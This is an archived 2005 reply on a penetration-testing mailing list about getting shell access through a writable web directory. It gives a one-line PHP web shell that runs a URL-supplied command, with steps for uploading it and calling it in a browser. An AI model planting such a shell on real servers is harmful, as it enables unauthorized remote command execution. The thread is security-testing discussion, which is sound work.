Penetration Testing mailing list archives
Re: How to get a reverse Shell / VNC from a writable directory on a remote web server.
From: Ricardo Mourato <ricardomcm () gmail com>
Date: Fri, 5 Aug 2005 18:46:40 +0100
well dude, you can check if the webserver is running any kind of scripting language like PHP or ASP and then write a script to execute commands on the webserver something like: -------------------begin------------------- <? shell_exec($cmd); ?> -----------------end------------------------ next you should upload the script to the writtable directory and call it from the browser E.G: http://webserver/world_writtable_dir/script_that_you_have_uploaded.php?&cmd=ls in this case, the script will execute the variable given from the URL (ls) if this works... man, you're in ;) good luck Ricardo Mourato. ------------------------------------------------------------------------------ FREE WHITE PAPER - Wireless LAN Security: What Hackers Know That You Don't Learn the hacker's secrets that compromise wireless LANs. Secure your WLAN by understanding these threats, available hacking tools and proven countermeasures. Defend your WLAN against man-in-the-Middle attacks and session hijacking, denial-of-service, rogue access points, identity thefts and MAC spoofing. Request your complimentary white paper at: http://www.securityfocus.com/sponsor/AirDefense_pen-test_050801 -------------------------------------------------------------------------------
Current thread:
- How to get a reverse Shell / VNC from a writable directory on a remote web server. AsTriXs (Aug 05)
- Re: How to get a reverse Shell / VNC from a writable directory on a remote web server. Ricardo Mourato (Aug 06)
- RE: How to get a reverse Shell / VNC from a writable directory on a remote web server. Irene Abezgauz (Aug 06)
- Re: How to get a reverse Shell / VNC from a writable directory on a remote web server. H D Moore (Aug 06)
- Re: How to get a reverse Shell / VNC from a writable directory on a remote web server. Maarten Hartsuijker (Aug 06)